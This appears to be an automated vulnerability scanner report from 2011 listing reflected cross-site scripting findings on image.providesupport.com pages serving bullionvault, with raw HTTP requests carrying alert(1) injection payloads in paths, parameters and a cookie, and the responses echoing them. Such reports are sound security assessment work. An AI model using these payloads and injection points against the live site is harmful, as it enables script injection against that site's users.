1. Cross-site scripting (reflected)
1.1. http://image.providesupport.com/cmd/bullionvault [REST URL parameter 1]
1.2. http://image.providesupport.com/favicon.ico [REST URL parameter 1]
1.3. http://image.providesupport.com/favicon.ico [name of an arbitrarily supplied request parameter]
1.4. http://image.providesupport.com/js/bullionvault/safe-standard.js [REST URL parameter 1]
1.5. http://image.providesupport.com/js/bullionvault/safe-standard.js [REST URL parameter 2]
1.6. http://image.providesupport.com/js/bullionvault/safe-standard.js [offline-image parameter]
1.7. http://image.providesupport.com/js/bullionvault/safe-standard.js [offline-image parameter]
1.8. http://image.providesupport.com/js/bullionvault/safe-standard.js [online-image parameter]
1.9. http://image.providesupport.com/js/bullionvault/safe-standard.js [vsid cookie]
2. Cookie scoped to parent domain
3. Cookie without HttpOnly flag set
4. HTML does not specify charset
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /cmd/bullionvault |
GET /cmd6cb27<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.bullionvault User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: vsid=RPg5nydCIFBs |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Thu, 26 May 2011 05:26:33 GMT Content-Length: 541 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /cmd6cb27<script>alert(1)< </pre> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /favicon.ico |
GET /favicon.ico197c6<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: vsid=o0pF4QCE7o9T |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Thu, 26 May 2011 05:56:04 GMT Content-Length: 587 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /favicon.ico197c6<script>alert(1)< </pre> <!-- ========================= <!-- ======== ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /favicon.ico |
GET /favicon.ico?7b84c<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: vsid=o0pF4QCE7o9T |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Thu, 26 May 2011 05:56:03 GMT Content-Length: 590 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /favicon.ico?7b84c<script>alert(1)< </pre> <!-- ========================= <!-- ===== ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/bullionvault/safe |
GET /js38c71<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.bullionvault User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Thu, 26 May 2011 05:26:34 GMT Content-Length: 583 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /js38c71<script>alert(1)< </pre> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://image.provide |
Path: | /js/bullionvault/safe |
GET /js/bullionvaultcbc6f<a>a95f834f481/safe-standard.js?ps_h Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.bullionvault User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Thu, 26 May 2011 05:26:34 GMT Content-Length: 561 <html> <body> <h2>Error 404: Not Found</h2> <pre> Page: /js/bullionvaultcbc6f<a>a95f834f481/safe-standard.js?ps_h </pre> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/bullionvault/safe |
GET /js/bullionvault/safe Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.bullionvault User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=uSe6D9fz3pTS;Path=/ Content-Length: 4874 Date: Thu, 26 May 2011 05:26:33 GMT Connection: close var psqZNssid = "uSe6D9fz3pTS"; // safe-standard@gecko.js var psqZNsiso; try { psqZNsiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psqZNswid != null); } catch(e) { psqZNs ...[SNIP]... <img name="psqZNsimage" src="/images/zoe-offline ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/bullionvault/safe |
GET /js/bullionvault/safe Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.bullionvault User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=H2fzK7N0fcLy;Path=/ Content-Length: 4874 Date: Thu, 26 May 2011 05:26:33 GMT Connection: close var psqZNssid = "H2fzK7N0fcLy"; // safe-standard@gecko.js var psqZNsiso; try { psqZNsiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psqZNswid != null); } catch(e) { psqZNs ...[SNIP]... sqZNsd.innerHTML = ''; } } var psqZNsop = false; function psqZNsco() { var w1 = psqZNsci.width - 1; psqZNsol = (w1 & 1) != 0; psqZNssb(psqZNsol ? "/images/zoe-online.gif" : "/images/zoe-offline.gif55f48";alert(1)/ psqZNsscf((w1 & 2) != 0); var h = psqZNsci.height; if (h != 2) { psqZNsop = false; } else if ((h == 2) && (!psqZNsop)) { psqZNsop = true; psqZNssi(); } } var psqZNsci = new Image(); psqZ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/bullionvault/safe |
GET /js/bullionvault/safe Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.bullionvault User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=Vm5yqTcKpR5u;Path=/ Content-Length: 4790 Date: Thu, 26 May 2011 05:26:33 GMT Connection: close var psqZNssid = "Vm5yqTcKpR5u"; // safe-standard@gecko.js var psqZNsiso; try { psqZNsiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psqZNswid != null); } catch(e) { psqZNs ...[SNIP]... </a>'; } } else { psqZNsd.innerHTML = ''; } } var psqZNsop = false; function psqZNsco() { var w1 = psqZNsci.width - 1; psqZNsol = (w1 & 1) != 0; psqZNssb(psqZNsol ? "/images/zoe-online.gifcb6a6";alert(1)/ psqZNsscf((w1 & 2) != 0); var h = psqZNsci.height; if (h != 2) { psqZNsop = false; } else if ((h == 2) && (!psqZNsop)) { psqZNsop = true; psqZNssi(); } } var ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/bullionvault/safe |
GET /js/bullionvault/safe Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.bullionvault User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: vsid=RPg5nydCIFBsf59fc"-alert(1)- |
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Content-Length: 4790 Date: Thu, 26 May 2011 05:35:45 GMT Connection: close var psqZNssid = "RPg5nydCIFBsf59fc"-alert(1)- // safe-standard@gecko.js var psqZNsiso; try { psqZNsiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psqZNswid != null); } catch(e) { psqZNsiso = false; } if (psqZNsiso) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/bullionvault/safe |
GET /js/bullionvault/safe Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.bullionvault User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=nhehJKfXDQqu;Path=/ Content-Length: 4762 Date: Thu, 26 May 2011 05:26:32 GMT Connection: close var psqZNssid = "nhehJKfXDQqu"; // safe-standard@gecko.js var psqZNsiso; try { psqZNsiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psqZNswid != null); } catch(e) { psqZNs ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/bullionvault/safe |
GET /js/bullionvault/safe Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.bullionvault User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=nhehJKfXDQqu;Path=/ Content-Length: 4762 Date: Thu, 26 May 2011 05:26:32 GMT Connection: close var psqZNssid = "nhehJKfXDQqu"; // safe-standard@gecko.js var psqZNsiso; try { psqZNsiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psqZNswid != null); } catch(e) { psqZNs ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: image.providesupport.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: vsid=o0pF4QCE7o9T |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Thu, 26 May 2011 05:55:59 GMT Content-Length: 546 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /favicon.ico </pre> <!-- ========================= <!-- ========================= ...[SNIP]... |